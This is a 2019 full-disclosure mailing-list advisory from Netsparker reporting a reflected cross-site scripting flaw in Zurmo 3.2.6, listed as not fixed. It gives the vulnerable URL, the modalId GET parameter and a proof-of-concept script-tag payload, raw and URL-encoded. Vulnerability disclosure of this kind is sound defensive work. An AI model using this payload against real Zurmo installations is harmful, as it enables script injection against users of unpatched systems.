[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Reflected Cross-site Scripting Vulnerability in Zurmo 3.2.6
From:       Daniel Bishtawi <daniel () netsparker ! com>
Date:       2019-07-25 9:36:40
Message-ID: CAKD6+R4iTA2v-9FGXm8HHua6dhez+nVzKZM=2duka1tQ0=V_1Q () mail ! gmail ! com
[Download RAW message or body]

Hello,

We are informing you about the vulnerabilities in Zurmo 3.2.6.

Here are the details:

Information
--------------------
Advisory by Netsparker
Name: Reflected Cross-site Scripting in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Reflected Cross-site Scripting
Severity: Critical
Status: Not Fixed
Netsparker Advisory Reference: NS-19-008

Technical Details
--------------------

URL: http://
{DOMAIN}/zurmo/app/index.php/tasks/default/modalCreate?modalId=<scRipt>alert("xss")</scRipt>
Parameter Name: modalId
Parameter Type:GET
Attack Pattern:%3cscRipt%3ealert("xss")%3c%2fscRipt%3e

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-008-reflected-cross-site-scripting-in-zurmo/


Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Tel: +44 (0)20 3588 3843
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>
<https://www.netsparker.com/blog/events/exhibiting-black-hat-usa-2019/>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic